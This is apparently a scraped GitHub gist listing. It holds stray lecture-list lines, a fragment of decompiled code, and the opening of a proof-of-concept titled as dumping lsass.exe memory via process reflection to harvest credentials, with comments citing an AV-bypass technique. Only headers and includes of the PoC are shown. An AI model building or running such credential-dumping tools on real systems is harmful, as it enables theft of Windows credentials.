Lecture 1: Introduction to Research — [📝Lecture Notebooks] [
Lecture 2: Introduction to Python — [📝Lecture Notebooks] [
Lecture 3: Introduction to NumPy — [📝Lecture Notebooks] [
Lecture 4: Introduction to pandas — [📝Lecture Notebooks] [
Lecture 5: Plotting Data — [📝Lecture Notebooks] [[
zouxianyu zouxianyu
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // positive sp value has been detected, the output may be wrong! | |
| __int64 __fastcall sub_119(__int64 a1, __int64 a2, __int64 a3, __int64 a4, char *a5) | |
| { | |
| void *v5; // rsp | |
| __int64 v6; // rax | |
| __int64 v7; // rax | |
| __int64 v8; // rax | |
| __int64 v9; // rax | |
| __int64 v10; // rax | |
| unsigned int v11; // eax |
GeneralTesler
/ refl.cpp
Last active
November 3, 2024 05:39
PoC using RtlCreateProcessReflection + MiniDumpWriteDump to dump lsass.exe process memory
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <iostream> | |
| #include <DbgHelp.h> | |
| #include <processsnapshot.h> | |
| #include <TlHelp32.h> | |
| #include <processthreadsapi.h> | |
| //process reflection stuff copied from: https://github.com/hasherezade/pe-sieve/blob/master/utils/process_reflection.cpp | |
| //minidump/process searching copied from: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass | |
| //compile using: cl.exe refl.cpp /DUNICODE |